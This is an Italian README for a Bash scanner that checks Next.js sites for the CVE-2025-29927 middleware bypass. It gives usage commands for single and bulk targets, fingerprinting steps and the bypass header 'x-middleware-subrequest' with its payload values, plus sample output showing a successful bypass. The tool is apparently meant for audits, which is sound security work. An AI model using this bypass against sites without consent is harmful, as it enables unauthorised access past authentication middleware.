
CVE-2025-29927 Verifica Exploit
Strumento automatizzato in Bash per rilevare applicazioni Next.js vulnerabili al bypass del middleware CVE-2025-29927, secondo la ricerca di Zhero Web Security.
bashwhatwebcurlInstallali su Debian/Ubuntu con:
sudo apt install whatweb curl
./CVE-2025-29927.sh -u https://example.com
Crea un file urls.txt con un URL per riga:
https://target1.com
https://target2.com
Esegui:
./nextjs_bypass_checker_v2.sh -l urls.txt
Identificazione di Next.js
whatweb per rilevare la tecnologia./_next/static/BUILD_ID e _buildManifest.js.Rilevamento del Middleware
X-Middleware-RewriteX-Middleware-Set-CookieTest di bypass
x-middleware-subrequest e vengono rilevate le intestazioni.[*] Analizzando: https://victima.com
[+] WhatWeb:
-> Rilevato: Next.js[12.2.0]
[+] BUILD_ID: 3fjd92hf8
[+] Versione rilevata: 12.2.0
[+] Middleware attivo (intestazioni rilevate):
X-Middleware-Rewrite: /not-found/locale=en
[+] Test degli exploit:
-> x-middleware-subrequest: middleware -> ✅ BYPASS RIUSCITO (intestazioni scomparse)
-> x-middleware-subrequest: src/middleware -> ❌ Middleware non eluso
[*] Completato: https://victima.com
Questo script è a scopo educativo e di audit autorizzato. Non utilizzarlo contro obiettivi senza consenso. L'uso improprio può costituire un'attività illegale.
Basato sulla ricerca di: Zhero Web Security